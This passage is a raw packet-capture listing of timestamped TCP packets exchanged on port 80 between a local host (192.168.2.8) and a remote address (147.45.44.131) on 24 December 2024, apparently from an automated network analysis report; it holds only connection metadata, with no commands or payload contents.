                                                          Dec 24, 2024 02:18:16.962235928 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.962430000 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.964487076 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.964535952 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.964716911 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.966893911 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.966939926 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.967216969 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.969234943 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.969283104 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.969424009 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.971565962 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.971615076 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.971776009 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.973896980 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.973942041 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.974065065 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.976115942 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.976160049 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.976324081 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.978379965 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.978427887 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.978585005 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.980587006 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.980631113 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.980914116 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.982817888 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.982861042 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.983019114 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.984973907 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.985016108 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.985188007 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.987186909 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.987235069 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.987396002 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.989315033 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.989394903 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.989516973 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.991466999 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.991512060 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.991660118 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.993618011 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.993690968 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.993897915 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.995692015 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.995728016 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.995933056 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.996895075 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.997090101 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.997134924 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.998097897 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.998140097 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.998305082 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.999300003 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.999345064 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.999516964 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.000540972 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.000591993 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.000734091 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.001761913 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.001807928 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.001976967 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.002919912 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.002959967 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.003129959 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.004136086 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.004180908 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.004349947 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.005399942 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.005449057 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.005589008 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.005984068 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.006033897 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.006383896 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.006762981 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.006804943 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.007215977 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.007229090 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.007281065 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.007952929 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.008229017 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.008275986 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.008654118 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.009093046 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.009130001 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.009181976 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.009915113 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.009952068 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.009957075 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.010694981 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.010746002 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.010763884 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.011328936 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.011367083 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.011416912 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.012108088 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.012141943 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.012160063 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.012849092 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.012900114 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.013276100 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.013856888 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.013921976 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.014056921 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.014522076 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.014589071 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.014873028 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.015264988 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.015321970 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.015635967 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.016083002 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.016119957 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.016129017 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.016829967 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.016911983 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.017227888 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.017664909 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.017699003 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.017760992 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.018405914 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.018440962 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.018487930 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.019176960 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.019490957 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.019594908 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.019630909 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.019686937 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.020363092 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.020803928 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.020848989 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.020855904 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.021608114 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.021642923 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.021666050 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.022380114 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.022414923 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.022439003 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.023164034 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.023197889 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.023226023 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.024063110 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.024101019 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.024148941 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.024756908 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.024791002 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.024818897 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.025563002 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.025599957 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.025623083 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.026309967 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.026371002 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.026648045 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.026704073 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.027076006 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.027529955 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.027582884 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.027868986 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.029339075 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.029397964 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.029532909 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.031045914 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.031095982 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.031234026 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.032798052 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.032850027 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.033004999 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.034508944 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.034559965 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.034696102 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.036262989 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.036310911 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.036459923 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.038003922 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.038047075 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.038201094 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.039747953 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.039800882 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.039959908 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.040525913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.040724993 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.040781975 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.041475058 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.041544914 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.041687965 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.043267965 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.043329954 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.043438911 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.045001984 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.045063972 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.045191050 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.046740055 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.046785116 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.046947002 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.048485041 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.048549891 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.048676968 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.050263882 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.050314903 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.050451994 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.052012920 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.052067995 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.052201033 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.053741932 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.053800106 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.053922892 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.055520058 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.055565119 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.055764914 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.057324886 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.057398081 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.057444096 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.058934927 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.058995008 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.059161901 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.060683012 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.060746908 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.060905933 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.062443972 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.062490940 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.062643051 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.064178944 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.064254999 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.064374924 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.065948963 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.066028118 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.066149950 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.067662001 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.067831993 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.067990065 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.069421053 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.069468975 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.069618940 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.071206093 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.071265936 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.071413994 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.072952986 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.073009014 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.073147058 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.074666977 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.074841022 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.074865103 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.076411009 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.076472998 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.076610088 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.078146935 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.078190088 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.078357935 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.079900980 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.080008984 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.080095053 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.081645012 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.081691027 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.081855059 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.083381891 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.083437920 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.083604097 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.085274935 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.085366964 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.110922098 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.123756886 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.123967886 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.124025106 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.124351978 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.124775887 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.124825001 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.125552893 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.125848055 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.125925064 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.126761913 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.127074957 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.127118111 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.127985954 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.128211975 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.128259897 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.129196882 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.129407883 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.129450083 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.130383015 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.130611897 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.130647898 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.131602049 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.131979942 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.132025957 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.132824898 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.133052111 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.133100033 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.133980036 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.136643887 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.136857033 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.136914968 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.137509108 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.137742043 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.137871981 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.139256001 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198220968 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198353052 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198415995 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.198796988 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.198885918 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.199157000 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.199780941 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.199835062 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.199984074 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.200891972 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.200951099 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.201111078 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.201962948 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.202003002 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.202168941 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.203042984 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.203090906 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.203228951 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.204093933 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.204143047 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.204308033 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.206513882 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.206811905 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.206859112 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.207083941 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.207123995 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.207776070 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.208003998 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.208606958 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.208806038 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.209031105 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.209075928 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.209891081 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.210103989 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.210146904 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.210916996 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.211133957 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.211177111 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.211947918 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.212172985 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.212573051 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.213007927 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.213231087 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.213274002 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:17.214046955 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:17.214263916 CET8049707147.45.44.131192.168.2.8
